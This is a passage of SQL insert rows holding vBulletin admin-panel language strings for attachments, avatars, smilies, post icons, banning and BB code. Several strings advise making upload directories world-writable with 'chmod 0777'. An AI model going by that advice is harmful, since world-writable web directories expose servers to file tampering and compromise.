(32523, -1, 'avatar_file_path', 'attachment_image', 'Avatar File Path', 'vbulletin', '', 0, ''),
(32524, -1, 'avatar_file_path_dfn', 'attachment_image', 'Avatar File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', '', 0, ''),
(32525, -1, 'avatar_manager', 'attachment_image', 'Avatar Manager', 'vbulletin', '', 0, ''),
(32526, -1, 'avatar_permissions', 'attachment_image', 'Avatar Permissions', 'vbulletin', '', 0, ''),
(32527, -1, 'avatars_are_currently_being_served_from_the_filesystem_at_x', 'attachment_image', 'Avatars are currently being served from the filesystem at {1}', 'vbulletin', '', 0, ''),
(32528, -1, 'avatars_deleted', 'attachment_image', 'Avatars Deleted', 'vbulletin', '', 0, ''),
(32529, -1, 'avatars_file_path', 'attachment_image', 'Avatars File Path', 'vbulletin', '', 0, ''),
(32530, -1, 'avatars_to_show_per_page', 'attachment_image', 'Avatars to Show Per Page', 'vbulletin', '', 0, ''),
(32531, -1, 'average_attachment_filesize', 'attachment_image', 'Average Attachment Filesize', 'vbulletin', '', 0, ''),
(32532, -1, 'can_use_this_avatar_category', 'attachment_image', 'Can Use This Avatar Category', 'vbulletin', '', 0, ''),
(32533, -1, 'can_use_this_extension', 'attachment_image', 'Can use this extension', 'vbulletin', 'vBulletin Solutions', 1148070857, '3.6.0 Beta 1'),
(32534, -1, 'can_use_this_post_icon_category', 'attachment_image', 'Can Use This Post Icon Category', 'vbulletin', '', 0, ''),
(32535, -1, 'can_use_this_smilie_category', 'attachment_image', 'Can Use This Smilie Category', 'vbulletin', '', 0, ''),
(32536, -1, 'confirm_attachment_removal', 'attachment_image', 'Confirm Attachment Removal', 'vbulletin', '', 0, ''),
(32537, -1, 'confirm_deletion_of_attachment_type_x', 'attachment_image', 'Confirm Deletion of Attachment Type: {1} ', 'vbulletin', '', 0, ''),
(32538, -1, 'confirm_deletion_of_avatar_category_x', 'attachment_image', 'Confirm Deletion of Avatar Category: {1} ', 'vbulletin', '', 0, ''),
(32539, -1, 'confirm_deletion_of_post_icon_category_x', 'attachment_image', 'Confirm Deletion of Post Icon Category: {1} ', 'vbulletin', '', 0, ''),
(32540, -1, 'confirm_deletion_of_smilie_category_x', 'attachment_image', 'Confirm Deletion of Smilie Category: {1} ', 'vbulletin', '', 0, ''),
(32541, -1, 'confirm_picture_data_removal', 'attachment_image', 'Confirm Picture Data Removal', 'vbulletin', 'vBulletin Solutions', 1192539199, '3.7.0 Beta 1'),
(32542, -1, 'contains', 'attachment_image', 'Contains', 'vbulletin', '', 0, ''),
(32543, -1, 'custom_attachment_permissions', 'attachment_image', 'Custom Attachment Permissions', 'vbulletin', 'vBulletin Solutions', 1148072057, '3.6.0 Beta 1'),
(32544, -1, 'delete_selected_attachments', 'attachment_image', 'Delete Selected Attachments', 'vbulletin', '', 0, ''),
(32545, -1, 'disk_space_used', 'attachment_image', 'Disk Space Used', 'vbulletin', '', 0, ''),
(32546, -1, 'downloads', 'attachment_image', 'Downloads', 'vbulletin', '', 0, ''),
(32547, -1, 'downloads_greater_than', 'attachment_image', 'More Than X Downloads', 'vbulletin', '', 0, ''),
(32548, -1, 'downloads_less_than', 'attachment_image', 'Less Than X Downloads', 'vbulletin', '', 0, ''),
(32549, -1, 'edit_attachment', 'attachment_image', 'Edit Attachment', 'vbulletin', '', 0, ''),
(32550, -1, 'edit_attachment_permissions_for_usergroup_x_in_extension_y', 'attachment_image', 'Edit Attachment Permissions For Usergroup: {1} in Extension {2}', 'vbulletin', 'vBulletin Solutions', 1148070810, '3.6.0 Beta 1'),
(32551, -1, 'edit_avatar_categories', 'attachment_image', 'Edit Avatar Categories', 'vbulletin', '', 0, ''),
(32552, -1, 'edit_post_icon_categories', 'attachment_image', 'Edit Post Icon Categories', 'vbulletin', '', 0, ''),
(32553, -1, 'edit_smilie_categories', 'attachment_image', 'Edit Smilie Categories', 'vbulletin', '', 0, ''),
(32554, -1, 'edit_storage_type', 'attachment_image', 'Edit Storage Type', 'vbulletin', '', 0, ''),
(32555, -1, 'extension', 'attachment_image', 'Extension', 'vbulletin', '', 0, ''),
(32556, -1, 'file_removal', 'attachment_image', 'Attachments in Database: {1} \r\nTotal Attachments Processed: {2} \r\nThe above two values should be the same! \r\nNumber of Attachments that could not be read or are 0 bytes: {3} \r\nWe have completed moving attachments to the database. Presently, the attachments still remain in the filesystem but are being read from the database.\r\nIf you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the filesystem. \r\nThis step cannot be reversed and may take a few minutes depending on the number of attachments. Please be patient. \r\nWe will only be able to remove attachments and attachment directories that we have write permission to. Normally this should be every attachment\r\nbut sometimes the permissions are not correct and the removal will fail. You will need to manually remove the attachments from the filesystem\r\nin this event.', 'vbulletin', '', 0, ''),
(32557, -1, 'filesize', 'attachment_image', 'Filesize', 'vbulletin', '', 0, ''),
(32558, -1, 'filesize_greater_than', 'attachment_image', 'Filesize Greater Than (bytes) ', 'vbulletin', '', 0, ''),
(32559, -1, 'filesize_less_than', 'attachment_image', 'Filesize Less Than (bytes) ', 'vbulletin', '', 0, ''),
(32560, -1, 'filetype', 'attachment_image', 'filetype', 'vbulletin', '', 0, ''),
(32561, -1, 'finalize', 'attachment_image', 'Finalize', 'vbulletin', '', 0, ''),
(32562, -1, 'find_all_attachments_older_than_days', 'attachment_image', 'Find All Attachments Older Than X Days', 'vbulletin', '', 0, ''),
(32563, -1, 'five_largest_attachments', 'attachment_image', 'Five Largest Attachments', 'vbulletin', '', 0, ''),
(32564, -1, 'five_most_popular_attachments', 'attachment_image', 'Five Most Popular Attachments', 'vbulletin', '', 0, ''),
(32565, -1, 'five_users_most_attachment_space', 'attachment_image', 'Five Users Whose Attachments Take Up the Most Space', 'vbulletin', '', 0, ''),
(32566, -1, 'full_picture_file_path', 'attachment_image', 'Full Picture File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', 'vBulletin Solutions', 1192538940, '3.7.0 Beta 1'),
(32567, -1, 'full_pictures', 'attachment_image', 'Full Pictures', 'vbulletin', 'vBulletin Solutions', 1192539162, '3.7.0 Beta 1'),
(32568, -1, 'function_rebuilds_album_picture_thumbs', 'attachment_image', 'This function rebuilds the album picture thumbnails. It is needed when you change thumbnail dimensions or quality.', 'vbulletin', 'vBulletin Solutions', 1192540457, '3.7.0 Beta 1'),
(32569, -1, 'images_are_currently_being_served_from_the_database', 'attachment_image', 'Images are currently being served from the database', 'vbulletin', '', 0, ''),
(32570, -1, 'keep_pictures_file_system_allow_thumb', 'attachment_image', 'Keep pictures in file system, but allow direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539917, '3.7.0 Beta 1'),
(32571, -1, 'keep_pictures_file_system_disable_thumb', 'attachment_image', 'Keep pictures in file system, but disallow direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539871, '3.7.0 Beta 1'),
(32572, -1, 'max_height_dfn', 'attachment_image', 'Maximum Height(in pixels, 600 for example) This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. ', 'vbulletin', '', 0, ''),
(32573, -1, 'max_width_dfn', 'attachment_image', 'Maximum Width(in pixels, 800 for example) This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. ', 'vbulletin', '', 0, ''),
(32574, -1, 'maximum_filesize', 'attachment_image', 'Maximum Filesize', 'vbulletin', '', 0, ''),
(32575, -1, 'maximum_filesize_dfn', 'attachment_image', 'Max Filesize(in bytes) There are several configuration options that limit the maximum size of uploaded files. Consult the Quick Stats on the your main Admin CP page for your current settings. ', 'vbulletin', 'vBulletin Solutions', 1205943036, '3.7.0 Release Candidate 1'),
(32576, -1, 'maximum_height', 'attachment_image', 'Max Height', 'vbulletin', '', 0, ''),
(32577, -1, 'maximum_width', 'attachment_image', 'Max Width', 'vbulletin', '', 0, ''),
(32578, -1, 'mime_type_dfn', 'attachment_image', 'Mime Type & HeadersThis controls what your browser does with the attachment. Leave blank if you don\'t know what to put here and the user will generally be prompted to download the attachment. This option is intended to be filled with HTTP Headers, one per line. To specify a MIME type, please use Content-Type: type/subtype ', 'vbulletin', 'vBulletin Solutions', 1210082906, '3.7.1'),
(32579, -1, 'move_avatars_to_a_different_directory', 'attachment_image', 'Move Avatars to a Different Directory', 'vbulletin', '', 0, ''),
(32580, -1, 'move_items_from_database_into_filesystem', 'attachment_image', 'Move Items from Database into File System', 'vbulletin', '', 0, ''),
(32581, -1, 'move_items_from_filesystem_into_database', 'attachment_image', 'Move Items from File System into Database', 'vbulletin', '', 0, ''),
(32582, -1, 'move_items_to_a_different_directory', 'attachment_image', 'Move Items to a Different Directory', 'vbulletin', '', 0, ''),
(32583, -1, 'move_pictures_into_database', 'attachment_image', 'Move pictures into the database', 'vbulletin', 'vBulletin Solutions', 1192539885, '3.7.0 Beta 1'),
(32584, -1, 'move_pictures_into_file_system_with_thumb', 'attachment_image', 'Move pictures into the file system with direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539959, '3.7.0 Beta 1'),
(32585, -1, 'move_pictures_into_file_system_without_thumb', 'attachment_image', 'Move pictures into the file system without direct access to thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539945, '3.7.0 Beta 1'),
(32586, -1, 'move_pictures_within_file_system', 'attachment_image', 'Move pictures within the file system', 'vbulletin', 'vBulletin Solutions', 1192539846, '3.7.0 Beta 1'),
(32587, -1, 'move_profilepics_to_a_different_directory', 'attachment_image', 'Move Profile Pictures to a Different Directory', 'vbulletin', '', 0, ''),
(32588, -1, 'move_sigpics_to_a_different_directory', 'attachment_image', 'Move Signature Pictures to a Different Directory', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32589, -1, 'new_window', 'attachment_image', 'New Win', 'vbulletin', '', 0, ''),
(32590, -1, 'number_of_attachments_to_process_per_cycle', 'attachment_image', 'Number of attachments to process per cycle', 'vbulletin', '', 0, ''),
(32591, -1, 'number_of_users_to_process_per_cycle', 'attachment_image', 'Number of Users to process per cycle', 'vbulletin', '', 0, ''),
(32592, -1, 'number_pictures_per_cycle', 'attachment_image', 'Number of pictures to process per cycle', 'vbulletin', 'vBulletin Solutions', 1192538657, '3.7.0 Beta 1'),
(32593, -1, 'open_in_new_window', 'attachment_image', 'Open this attachment in a new browser window?', 'vbulletin', '', 0, ''),
(32594, -1, 'or_enter_a_full_url_to_a_file', 'attachment_image', 'Or enter a full URL to a file to upload', 'vbulletin', 'vBulletin Solutions', 1205939189, '3.7.0 Release Candidate 1'),
(32595, -1, 'permissions_for_avatar_category_x', 'attachment_image', 'Permissions For Avatar Category {1} ', 'vbulletin', '', 0, ''),
(32596, -1, 'permissions_for_post_icon_category_x', 'attachment_image', 'Permissions For Post Icon Category {1} ', 'vbulletin', '', 0, ''),
(32597, -1, 'permissions_for_smilie_category_x', 'attachment_image', 'Permissions For Smilie Category {1} ', 'vbulletin', '', 0, ''),
(32598, -1, 'picture_thumbnail_file_path', 'attachment_image', 'Picture and Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', 'vBulletin Solutions', 1192539062, '3.7.0 Beta 1'),
(32599, -1, 'pictures_moved_database_count_xyz', 'attachment_image', ' Pictures have been moved to the database. Of the {1} pictures in the database, {2} were processed. {3} had errors.
\r\nSelecting finalize below will remove the duplicate data from the file system and begin serving pictures from the database. Any pictures that did not convert successfully will be lost.
', 'vbulletin', 'vBulletin Solutions', 1192540662, '3.7.0 Beta 1'),
(32600, -1, 'pictures_moved_file_system_count_xyz', 'attachment_image', 'Pictures have been moved to the file system. Of the {1} pictures in the database, {2} were processed. {3} had errors.
\r\nSelecting finalize below will remove the duplicate data from the database and begin serving pictures from the file system. Any pictures that did not convert successfully will be lost.
', 'vbulletin', 'vBulletin Solutions', 1192540606, '3.7.0 Beta 1'),
(32601, -1, 'pictures_moved_thumbnails_disabled_count_xyz', 'attachment_image', 'Picture thumbnails have been moved and are no longer directly accessible. Of the {1} pictures in the database, {2} were processed. {3} had errors.
\r\nSelecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.
', 'vbulletin', 'vBulletin Solutions', 1192540720, '3.7.0 Beta 1'),
(32602, -1, 'pictures_moved_thumbnails_enabled_count_xyz', 'attachment_image', 'Picture thumbnails have been moved and are now directly accessible. Of the {1} pictures in the database, {2} were processed. {3} had errors.
\r\nSelecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.
', 'vbulletin', 'vBulletin Solutions', 1192540787, '3.7.0 Beta 1'),
(32603, -1, 'please_select_a_file_to_attach', 'attachment_image', 'Please select a file to attach by using the \"Browse...\" button.', 'vbulletin', '', 0, ''),
(32604, -1, 'possible_not_enough_disk_space_finalize', 'attachment_image', 'It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
\r\n\r\nWe will not finalize the move until the end of the process.
\r\n\r\nIf the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', 'vBulletin Solutions', 1192539544, '3.7.0 Beta 1'),
(32605, -1, 'post_icon', 'attachment_image', 'Post Icon', 'vbulletin', '', 0, ''),
(32606, -1, 'post_icon_category', 'attachment_image', 'Post Icon Category', 'vbulletin', '', 0, ''),
(32607, -1, 'post_icon_file_path', 'attachment_image', 'Post Icon File Path', 'vbulletin', '', 0, ''),
(32608, -1, 'post_icon_file_path_dfn', 'attachment_image', 'Post Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', '', 0, ''),
(32609, -1, 'post_icon_manager', 'attachment_image', 'Post Icon Manager', 'vbulletin', '', 0, ''),
(32610, -1, 'post_icon_permissions', 'attachment_image', 'Post Icon Permissions', 'vbulletin', '', 0, ''),
(32611, -1, 'post_icons_deleted', 'attachment_image', 'Post Icons Deleted', 'vbulletin', '', 0, ''),
(32612, -1, 'post_icons_file_path', 'attachment_image', 'Post Icons File Path', 'vbulletin', '', 0, ''),
(32613, -1, 'post_icons_to_show_per_page', 'attachment_image', 'Post Icons to Show Per Page', 'vbulletin', '', 0, ''),
(32614, -1, 'processing_avatar', 'attachment_image', 'Processing Avatar', 'vbulletin', '', 0, ''),
(32615, -1, 'processing_post_icon', 'attachment_image', 'Processing Post Icon', 'vbulletin', '', 0, ''),
(32616, -1, 'processing_smilie', 'attachment_image', 'Processing Smilie ...', 'vbulletin', '', 0, ''),
(32617, -1, 'profile_picture', 'attachment_image', 'Profile Picture', 'vbulletin', '', 0, ''),
(32618, -1, 'profilepic_file_path_dfn', 'attachment_image', 'Profile Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', '', 0, ''),
(32619, -1, 'profilepics_are_currently_being_served_from_the_filesystem_at_x', 'attachment_image', 'Profile pictures are currently being served from the filesystem at {1}', 'vbulletin', '', 0, ''),
(32620, -1, 'prune_attachments', 'attachment_image', 'Prune Attachments', 'vbulletin', '', 0, ''),
(32621, -1, 'read_disable_direct_access_thumbnails', 'attachment_image', 'We are ready to disable direct access to your pictures\' thumbnails.', 'vbulletin', 'vBulletin Solutions', 1192540100, '3.7.0 Beta 1'),
(32622, -1, 'ready_move_pictures_file_system_options', 'attachment_image', 'We are ready to move your pictures into the file system with the options you specified.', 'vbulletin', 'vBulletin Solutions', 1192539740, '3.7.0 Beta 1'),
(32623, -1, 'ready_move_pictures_into_database', 'attachment_image', 'We are ready to move your pictures into the database.', 'vbulletin', 'vBulletin Solutions', 1192540077, '3.7.0 Beta 1'),
(32624, -1, 'rebuild_album_picture_thumbnails', 'attachment_image', 'Rebuild Album Picture Thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539360, '3.7.0 Beta 1'),
(32625, -1, 'removing_x_attachments', 'attachment_image', 'Removing {1} attachments from the database.', 'vbulletin', '', 0, ''),
(32626, -1, 'removing_x_records', 'attachment_image', 'Removing {1} record(s)', 'vbulletin', 'vBulletin Solutions', 1192540414, '3.7.0 Beta 1'),
(32627, -1, 'replace_attachment', 'attachment_image', 'Replace Attachment', 'vbulletin', '', 0, ''),
(32628, -1, 'show_all_avatars', 'attachment_image', 'Show All Avatars', 'vbulletin', '', 0, ''),
(32629, -1, 'show_all_post_icons', 'attachment_image', 'Show All Post Icons', 'vbulletin', '', 0, ''),
(32630, -1, 'show_all_smilies', 'attachment_image', 'Show all Smilies', 'vbulletin', '', 0, ''),
(32631, -1, 'showing_attachments_x_to_y_of_z', 'attachment_image', 'Showing Attachments {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925440, '3.7.0 Release Candidate 1'),
(32632, -1, 'sigpic_file_path_dfn', 'attachment_image', 'Signature Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32633, -1, 'sigpics_are_currently_being_served_from_the_filesystem_at_x', 'attachment_image', 'Signature pictures are currently being served from the filesystem at {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32634, -1, 'smilie', 'attachment_image', 'Smilie', 'vbulletin', '', 0, ''),
(32635, -1, 'smilie_category', 'attachment_image', 'Smilie Category', 'vbulletin', '', 0, ''),
(32636, -1, 'smilie_file_path', 'attachment_image', 'Smilie File Path', 'vbulletin', '', 0, ''),
(32637, -1, 'smilie_file_path_dfn', 'attachment_image', 'Smilie File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', '', 0, ''),
(32638, -1, 'smilie_manager', 'attachment_image', 'Smilie Manager', 'vbulletin', '', 0, ''),
(32639, -1, 'smilie_permissions', 'attachment_image', 'Smilie Permissions', 'vbulletin', '', 0, ''),
(32640, -1, 'smilies_deleted', 'attachment_image', 'Smilies Deleted', 'vbulletin', '', 0, ''),
(32641, -1, 'smilies_file_path', 'attachment_image', 'Smilies File Path', 'vbulletin', '', 0, ''),
(32642, -1, 'smilies_to_show_per_page', 'attachment_image', 'Smilies to Show Per Page', 'vbulletin', '', 0, ''),
(32643, -1, 'smilietext_x_taken', 'attachment_image', 'The replacement text {1} is already in use!', 'vbulletin', '', 0, ''),
(32644, -1, 'standard_using_default_attachment_permissions', 'attachment_image', 'Standard: Using default attachment permissions', 'vbulletin', 'vBulletin Solutions', 1148069648, '3.6.0 Beta 1'),
(32645, -1, 'starting_picture_id', 'attachment_image', 'Starting Picture ID', 'vbulletin', 'vBulletin Solutions', 1192538701, '3.7.0 Beta 1'),
(32646, -1, 'storage_type', 'attachment_image', 'Storage Type', 'vbulletin', '', 0, ''),
(32647, -1, 'text_to_replace', 'attachment_image', 'Text to Replace', 'vbulletin', '', 0, ''),
(32648, -1, 'thumb', 'attachment_image', 'Thumb', 'vbulletin', '', 0, ''),
(32649, -1, 'thumbnail_file_path', 'attachment_image', 'Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', 'vBulletin Solutions', 1192538956, '3.7.0 Beta 1'),
(32650, -1, 'thumbnail_image', 'attachment_image', 'Display thumbnail for this type?This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. The creation of a thumbnail for any image type is not guaranteed. ', 'vbulletin', '', 0, ''),
(32651, -1, 'thumbnail_quality', 'attachment_image', 'Thumbnail Quality', 'vbulletin', 'vBulletin Solutions', 1192539338, '3.7.0 Beta 1'),
(32652, -1, 'thumbnails', 'attachment_image', 'Thumbnails', 'vbulletin', 'vBulletin Solutions', 1192539176, '3.7.0 Beta 1'),
(32653, -1, 'total_attachments', 'attachment_image', 'Total Attachments', 'vbulletin', '', 0, ''),
(32654, -1, 'total_downloads', 'attachment_image', 'Total Downloads', 'vbulletin', '', 0, ''),
(32655, -1, 'total_size', 'attachment_image', 'Total Size', 'vbulletin', '', 0, ''),
(32656, -1, 'uncategorized', 'attachment_image', 'uncategorized', 'vbulletin', '', 0, ''),
(32657, -1, 'upload_avatar', 'attachment_image', 'Upload Avatar', 'vbulletin', '', 0, ''),
(32658, -1, 'upload_post_icon', 'attachment_image', 'Upload Post Icon', 'vbulletin', '', 0, ''),
(32659, -1, 'upload_smilie', 'attachment_image', 'Upload Smilie', 'vbulletin', '', 0, ''),
(32660, -1, 'url_to_avatars_relative_to_your_forums_home_page', 'attachment_image', 'URL to avatars (Relative to your forums home page) ', 'vbulletin', '', 0, ''),
(32661, -1, 'url_to_profilepics_relative_to_your_forums_home_page', 'attachment_image', 'URL to Profile Pictures (Relative to your forums home page) ', 'vbulletin', '', 0, ''),
(32662, -1, 'url_to_sigpics_relative_to_your_forums_home_page', 'attachment_image', 'URL to Signature Pictures(Relative to your forums home page) ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32663, -1, 'url_to_thumbnails', 'attachment_image', 'URL to Thumbnails\r\n(relative to main forum directory) ', 'vbulletin', 'vBulletin Solutions', 1192539004, '3.7.0 Beta 1'),
(32664, -1, 'use_default_permissions', 'attachment_image', 'Use Default Permissions for this extension (Note: this will delete any previous custom permissions set)', 'vbulletin', 'vBulletin Solutions', 1148072303, '3.6.0 Beta 1'),
(32665, -1, 'user_pictures', 'attachment_image', 'User Pictures', 'vbulletin', '', 0, ''),
(32666, -1, 'userpic_manager', 'attachment_image', 'User Picture Manager', 'vbulletin', '', 0, ''),
(32667, -1, 'view_attachments', 'attachment_image', 'View Attachments', 'vbulletin', '', 0, ''),
(32668, -1, 'view_largest_attachments', 'attachment_image', 'View Largest Attachments', 'vbulletin', '', 0, ''),
(32669, -1, 'view_most_popular_attachments', 'attachment_image', 'View Most Popular Attachments', 'vbulletin', '', 0, ''),
(32670, -1, 'view_newest_attachments', 'attachment_image', 'View Newest Attachments', 'vbulletin', '', 0, ''),
(32671, -1, 'view_oldest_attachments', 'attachment_image', 'View Oldest Attachments', 'vbulletin', '', 0, ''),
(32672, -1, 'view_permissions', 'attachment_image', 'View Permissions', 'vbulletin', 'vBulletin Solutions', 1148058018, '3.6.0 Beta 1'),
(32673, -1, 'visible', 'attachment_image', 'Visible', 'vbulletin', '', 0, ''),
(32674, -1, 'we_are_ready_to_attempt_to_move_your_attachments_from_database_to_filesystem', 'attachment_image', 'We are ready to attempt to move your Attachments from the Database to the Filesystem.
It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', '', 0, ''),
(32675, -1, 'we_are_ready_to_attempt_to_move_your_attachments_from_filesystem_to_database', 'attachment_image', 'We are ready to attempt to move your Attachments from the Filesystem to the Database.
It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', '', 0, ''),
(32676, -1, 'we_are_ready_to_attempt_to_move_your_images_from_database_to_filesystem', 'attachment_image', 'We are ready to attempt to move your Images from the Database to the Filesystem.
It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', '', 0, ''),
(32677, -1, 'we_are_ready_to_attempt_to_move_your_images_from_filesystem_to_database', 'attachment_image', 'We are ready to attempt to move your images from the filesystem to the database.
\r\n\r\nIt is possible that you might not have enough space in the database, but we are unable to determine that ahead of time.
\r\n\r\nWe will not finalize the move until the end of the process. If the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', 'vBulletin Solutions', 1158575365, '3.6.2'),
(32678, -1, 'ban_options', 'banning', 'Ban Options', 'vbulletin', 'vBulletin Solutions', 1192466939, '3.7.0 Beta 1'),
(32679, -1, 'ban_period', 'banning', 'Ban Period', 'vbulletin', '', 0, ''),
(32680, -1, 'ban_reason', 'banning', 'Ban Reason', 'vbulletin', '', 0, ''),
(32681, -1, 'ban_time_remaining', 'banning', 'Ban Time Remaining', 'vbulletin', '', 0, ''),
(32682, -1, 'ban_user', 'banning', 'Ban User', 'vbulletin', '', 0, ''),
(32683, -1, 'ban_will_be_lifted_on', 'banning', 'Ban Will Be Lifted On', 'vbulletin', '', 0, ''),
(32684, -1, 'banned_by', 'banning', 'Banned By', 'vbulletin', '', 0, ''),
(32685, -1, 'banned_on', 'banning', 'Banned On', 'vbulletin', '', 0, ''),
(32686, -1, 'banning', 'banning', 'Banning', 'vbulletin', 'vBulletin Solutions', 1198153728, '3.7.0 Beta 3'),
(32687, -1, 'confirm_ban_lift_on_x', 'banning', 'Are you sure you want to lift the ban on {1}?', 'vbulletin', '', 0, ''),
(32688, -1, 'forever', 'banning', 'Forever', 'vbulletin', '', 0, ''),
(32689, -1, 'lift_ban', 'banning', 'Lift Ban', 'vbulletin', '', 0, ''),
(32690, -1, 'lift_ban_after', 'banning', 'Lift Ban After...Select the length of the ban here. The ban will be lifted at the time specified ', 'vbulletin', '', 0, ''),
(32691, -1, 'never_lift_ban', 'banning', 'Never Lift Ban', 'vbulletin', '', 0, ''),
(32692, -1, 'permanent_ban', 'banning', 'Permanent Ban', 'vbulletin', '', 0, ''),
(32693, -1, 'permanent_ban_options', 'banning', 'Permanent Ban Options', 'vbulletin', '', 0, ''),
(32694, -1, 'temporary_ban', 'banning', 'Temporary Ban', 'vbulletin', '', 0, ''),
(32695, -1, 'temporary_ban_options', 'banning', 'Temporary Ban Options', 'vbulletin', '', 0, ''),
(32696, -1, 'user_ban_reason', 'banning', 'Reason to show the user', 'vbulletin', '', 0, ''),
(32697, -1, 'user_banning', 'banning', 'User Banning', 'vbulletin', '', 0, ''),
(32698, -1, 'will_be_lifted_soon', 'banning', 'Will be lifted soon', 'vbulletin', '', 0, ''),
(32699, -1, 'add_new_bb_code', 'bbcode', 'Add New BB Code', 'vbulletin', '', 0, ''),
(32700, -1, 'are_you_sure_want_to_delete_bb_code_x', 'bbcode', 'Are you sure you want to delete the BB code called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(32701, -1, 'bb_code', 'bbcode', 'BB Code', 'vbulletin', '', 0, ''),
(32702, -1, 'bb_code_explanations', 'bbcode', 'Explanations: \r\nTitle: The title of your tag, which will be used to generate the BB code list . \r\nTag: This is the text for the BB code, which goes inside the square brackets. \r\ne.g. you would use \'b\' for [b] tags, \'url\' (without quotes) for [url] tags. \r\nReplacement: This is the HTML code for the BB code replacement. Make sure that you include \'{param}\' (without the quotes) to insert the text between the opening and closing BB code tags, and \'{option}\' for the parameter within the BB code tag. You can only use {option} if \'Use Option\' is set to yes. \r\ne.g. you would use <b>{param}</b> for tags, <a href=\"{option}\">{param}</a> for [url=xxx] . You will always use \'{param}\', but you will only use \'{option}\' when \"Use Option?\" is \"yes.\" \r\nExample: This is a sample piece of BB code to use as an example for this particular BB code. \r\ne.g. you would use [b]Bold[/b] for [b] tags, [url=http://www.example.com]Example Web Site[/url] for [url] tags \r\nDescription: This is a piece of text to describe the BB code tag. This can include HTML tags if you wish. \r\nUse Option: Setting this option to yes will allow you to create a [tag=option][/tag] style tag, rather than just a [tag][/tag] style tag.', 'vbulletin', 'vBulletin Solutions', 1206971178, '3.7.0 Release Candidate 2'),
(32703, -1, 'bb_code_manager', 'bbcode', 'BB Code Manager', 'vbulletin', '', 0, ''),
(32704, -1, 'bb_code_tag_name', 'bbcode', 'BB Code Tag Name', 'vbulletin', 'vBulletin Solutions', 1210696394, '3.7.1'),
(32705, -1, 'bbcode_plaintext_attachment_x', 'bbcode', 'Attachment {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32706, -1, 'bbcode_plaintext_code_x', 'bbcode', 'Code:\r\n---------\r\n{1}\r\n---------', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32707, -1, 'bbcode_plaintext_html_x', 'bbcode', 'HTML:\r\n---------\r\n{1}\r\n---------', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32708, -1, 'bbcode_plaintext_image_x', 'bbcode', 'Image: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32709, -1, 'bbcode_plaintext_php_x', 'bbcode', 'PHP:\r\n---------\r\n{1}\r\n---------', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32710, -1, 'bbcode_plaintext_quote_username_x_y', 'bbcode', '---Quote (Originally by {1})---\r\n{2}\r\n---End Quote---', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32711, -1, 'bbcode_plaintext_quote_x', 'bbcode', '---Quote---\r\n{1}\r\n---End Quote---', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(32712, -1, 'button_image', 'bbcode', 'Button Image', 'vbulletin', '', 0, ''),
(32713, -1, 'button_image_desc', 'bbcode', 'Button Image (Optional) If you would like this BB code to appear as a clickable button on the message editor toolbar, enter the URL of an image 21 x 20 pixels in size that will act as the button to insert this BB code. ', 'vbulletin', 'vBulletin Solutions', 1206966145, '3.7.0 Release Candidate 2'),
(32714, -1, 'disable_bbcode_in_bbcode', 'bbcode', 'Disable BB Code Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1194351240, '3.7.0 Beta 1'),
(32715, -1, 'disable_smilies_in_bbcode', 'bbcode', 'Disable Smilies Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1194351261, '3.7.0 Beta 1'),
(32716, -1, 'disable_urlconversion_in_bbcode', 'bbcode', 'Disable Automatic Link Parsing Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1266327422, '3.8.5'),
